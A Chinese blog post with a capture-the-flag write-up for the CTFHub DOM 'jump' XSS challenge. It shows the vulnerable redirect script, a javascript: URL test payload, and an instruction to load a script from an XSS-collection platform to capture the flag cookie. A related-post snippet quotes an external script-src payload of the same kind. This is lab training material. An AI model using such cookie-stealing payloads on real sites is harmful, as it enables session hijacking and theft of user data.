CTFHub XSS DOM 跳转

于 2024-08-02 23:15:44 发布
阅读量166 收藏
点赞数 6
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48368964/article/details/140882118
版权

查看网页源代码 

<script>
        var target = location.search.split("=")
        if (target[0].slice(1) == "jumpto") {
            location.href = target[1];
        }
</script>

注意!当你将类似于 location.href = "javascript:alert('xss')" 这样的代码赋值给 location.href 时,浏览器会将其解释为一种特殊的URL方案,即 “javascript:”。在这种情况下,浏览器会将后面的 JavaScript 代码作为URL的一部分进行解析,然后执行它。

直接在网页url后面跟上代码测试反弹

?jumpto=javascript:alert(1);

发现可以 老步骤 去xssaq.com上 复制一个 src来 接受 flag

 


                

        

        

    




    

      

        

            

              
                
                  A  八方
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    6
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
反射型xss攻击流量数据包

				
			

			

				

					07-18
				

			

		

		

			
				
反射型xss攻击流量数据包

			
		

	



                

              
                



	

		

			

				
					
ctfhub web全部做题记录(持续跟新)

				
			

			

				

					01-08
				

			

		

		

			
				
【Web安全】Web安全是网络安全的一个重要分支,主要关注Web应用程序的安全性,防止诸如SQL注入、XSS攻击、文件上传漏洞等威胁。  【信息泄露】信息泄露是指由于配置错误或不安全的设置导致敏感信息暴露。在描述中...

			
		

	



                


  
              

                


	

		

			

				
					
CTFHub XSS DOM跳转 WriteUp

				
			

			

				

					柠檬i的博客
				

				

					07-05
					
					2175
					
				

			

		

		

			
				
跳转 XSS 的攻击方式涉及将恶意脚本嵌入到跳转链接或重定向 URL 中,以便在用户点击该链接或重定向时触发脚本的执行。攻击者可以利用跳转 XSS 攻击来进行会话劫持、盗取用户信息、篡改页面内容等恶意活动。

为了防止跳转 XSS 攻击,开发人员应该对用户输入的数据进行适当的验证、过滤和转义,以确保在将其嵌入到页面中之前进行正确的处理。此外,安全的编程实践和使用安全的开发框架也是防止跳转 XSS 的关键。

			
		

	





	

		

			

				
					
CTFHub XSS DOM反射 WriteUp

				
			

			

				

					柠檬i的博客
				

				

					07-04
					
					2069
					
				

			

		

		

			
				
查看前端代码,构造语句闭合标签,以此完成xss攻击

			
		

	



		

			
		



	

		

			

				
					
CTFHub——XSS

				
			

			

				

					2302_79119987的博客
				

				

					03-28
					
					1028
					
				

			

		

		

			
				
"fangfa('可控点')"> 使用 ” 闭合:与上题解题思路一致,用插入语句后用xss平台找到flag,插入语句后发现无回显(模拟黑客发送xss到服务器),查找源码,发现插入成功。将xss代码输入测试栏,发现url地址有变化,将url地址复制到url地址栏,上传成功后在xss平台查看cookie。尝试注入,查看源码发现过滤空格,url地址不对,使用/**/过滤。

			
		

	





	

		

			

				
					
ctfhubxss

				
			

			

				

					小宇的web博客
				

				

					05-22
					
					1650
					
				

			

		

		

			
				
ctfhubxss
1.我接触使用过三个XSS平台
1.脚本非常丰富:http://www.1oad.com
2.简约:https://xsspt.com
3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn
所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明;
解题流程
1.先在上面的what’s your name 输入JavaScript语句,发现出错只能使用xss平台在下面的对话框中进行xss漏洞注入。


这里先注册一下xss测试平

			
		

	





	

		

			

				
					
CTFHub技能树web之XSS

				
			

			

				

					wzhwzh123321的博客
				

				

					02-26
					
					1364
					
				

			

		

		

			
				
XSS系列的题目中,由于需要使用能够接受XSS数据的平台,并且由于使用的是CTFHub的模拟机器人点击我们的虚假URL,因此使用的XSS平台不能是自己本地搭建的,如果是本地的模拟点击的机器人将无法访问我们给的这个URL地址,也就无法接收到我们想要的数据了,因此想解决本系列的题目,可以通过在线XSS平台或者自己使用服务器搭建一个XSS平台。可以看到可控的位置在53-55行中的这个位置,先闭合前面的单引号和<script>,然后再用一个<script>输入XSS代码,构造语句如下';第三题: DOM反射。

			
		

	





	

		

			

				
					
CTFHub靶场:XSS

				
			

			

				

					NSQ0207的博客
				

				

					07-25
					
					346
					
				

			

		

		

			
				
放入脚本,使用$.getScript功能是异步加载并执行。​​​​​​​查看cookie的flag。检查是否存在弹窗,可以放在url地址栏上执行。​​​​​​​查看cookie的flag。​​​​​​​查看cookie的flag。​​​​​​​查看cookie的flag。查看cookie的flag。查看cookie的flag。有空格,用/代替 (/**/)

			
		

	





	

		

			

				
					
CTFHUB WEB

				
			

			

				

					m0_62566376的博客
				

				

					07-17
					
					781
					
				

			

		

		

			
				
ctfhub web笔记

			
		

	





	

		

			

				
					
ctfhub-技能树-xss题集全部习题详解-最新

				
			

			

				

					weixin_73562787的博客
				

				

					08-10
					
					3428
					
				

			

		

		

			
				
结合</textarea>'"><script src=http://xsscom.com//He7bc3></script>构成上面源码部分闭合符合条件,可以删掉</textarea>'">不影响。分析一下,代码意思是 从当前页面的URL中获取查询字符串(URL的get参数),如果参数名为"jumpto",则将页面重定向到参数值所指定的URL。然后再复制url,把它复制到第二个框框发送,在我们的xss平台的项目中就会显示刚刚的数据包的信息,在cookie中发现了flag。

			
		

	





	

		

			

				
					
CTFHub靶场————XSS

				
			

			

				

					qq_61579604的博客
				

				

					10-17
					
					235
					
				

			

		

		

			
				
写入代码查看是否出现弹窗,查看源码发现存在xss但需要闭合后才可以出现弹窗。放入脚本,使用$.getScript功能是异步加载并执行。查看脚本注意闭合(利用xss平台的脚本代码)检查是否存在弹窗,可以放在url地址栏上执行。去平台查看cookie获取flag。检测是否出现弹窗利用双写绕过过滤。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。写入代码查看是否出现弹窗。插入脚本后将网址输入。

			
		

	





	

		

			

				
					
JQuery Dom XSS探测.html

				
			

			

				

					05-15
				

			

		

		

			
				
可以直接测试网站里面的JQuery本地弹窗xss,属于渗透测试项一部分,此项目在xss中也属于高危,只需要替换里面的带测试链接即可。

			
		

	





	

		

			

				
					
XSS漏洞 DOM型测试 payload代码

				
			

			

				

					02-26
				

			

		

		

			
				
XSS漏洞 DOM型测试 payload代码 这是测试跨脚本攻击是否有DOMXSS的漏洞,适合网络安全初学者进行测试。 跨脚本攻击漏洞是top10的一种。

			
		

	





	

		

			

				
					
记一次因敏感信息泄露而导致的越权+存储型XSS

				
			

			

				

					2301_80127209的博客
				

				

					07-23
					
					647
					
				

			

		

		

			
				
可能各位师傅会有苦于不知道如何寻找测试目标的烦恼,这里我惯用的就是寻找可进站的思路。这个思路分为两种,一是弱口令进站测试,二是可注册进站测试。依照这个思路,我依旧是用鹰图进行了一波资产的搜集。

			
		

	





	

		

			

				
					
前端Web-JavaScript(上)

				
			

			

				

					Yu2uki的博客
				

				

					07-31
					
					1309
					
				

			

		

		

			
				
JavaScript(简称:JS) 是一门跨平台、面向对象的脚本语言,是用来控制网页行为的,实现人机交互效果。JavaScript 和 Java 是完全不同的语言,不论是概念还是设计。但是基础语法类似。组成:ECMAScript: 规定了JS基础语法核心知识,包括变量、数据类型、流程控制、函数、对象等。BOM:浏览器对象模型,用于操作浏览器本身,如:页面弹窗、地址栏操作、关闭窗口等。DOM:文档对象模型,用于操作HTML文档,如:改变标签内的内容、改变标签内字体样式等。

			
		

	





	

		

			

				
					
【分享】前端程序员-技术网站推荐

				
			

			

				

					一位前行者的博客
				

				

					07-30
					
					856
					
				

			

		

		

			
				
对于前端开发人员来说,以下是一些推荐的技术网站,这些网站提供了丰富的资源和知识,可以帮助你提升前端开发技能:收集一些 、、 的网站   vite 官方中文文档   element-plus 官方中文文档   pinia 官方中文文档   vue-router 官方中文文档   Tailwind CSS 官方文档   vitest 官方中文文档   es6 中文文档   axios 官方中文文档   vxetable 官方中文文档   lodash 中文文档   echarts 官方中文文档   animat

			
		

	





	

		

			

				
					
前端面试】五、框架

					
最新发布

				
			

			

				

					weixin_49015558的博客
				

				

					07-31
					
					449
					
				

			

		

		

			
				
1 Vue2

2 Vue3

3 React

4 Angular

			
		

	





	

		

			

				
					
CTFhub XSS技能树DOM

				
			

			

				

					07-29
				

			

		

		

			
				
XSS (Cross-Site Scripting) 是一种常见的网络安全漏洞,攻击者通过在网页中注入恶意脚本来实施攻击。DOM (Document Object Model) 是一种用于表示和操作网页文档的编程接口。

在 CTFhub 中,XSS 技能树涵盖了多个与 XSS 相关的知识点和攻击场景。以下是一些可能包含在 XSS 技能树中的主题:

1. XSS 基础知识:深入理解 XSS 的原理、类型和危害。
2. 攻击载体:了解常见的 XSS 攻击载体,如 HTML、JavaScript、CSS、URL 参数等。
3. 攻击向量:学习常见的 XSS 攻击向量,如存储型、反射型和 DOMXSS。
4. 编码技巧:掌握对恶意脚本进行编码和绕过防护机制的技巧。
5. 攻击场景:了解在不同的应用场景下如何利用 XSS 漏洞进行攻击,如登录表单、搜索功能等。
6. 防御措施:学习如何预防和修复 XSS 漏洞,包括输入验证、输出编码、CSP (Content Security Policy) 等。

这只是一个简单的示例,实际的 XSS 技能树可能会更加详细和全面。在学习 XSS 技能树时,你可以通过阅读相关的文档、参与挑战和实践来提高自己的技能。记住,安全意识和代码审计能力也是成为一名优秀的安全工程师的重要因素。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值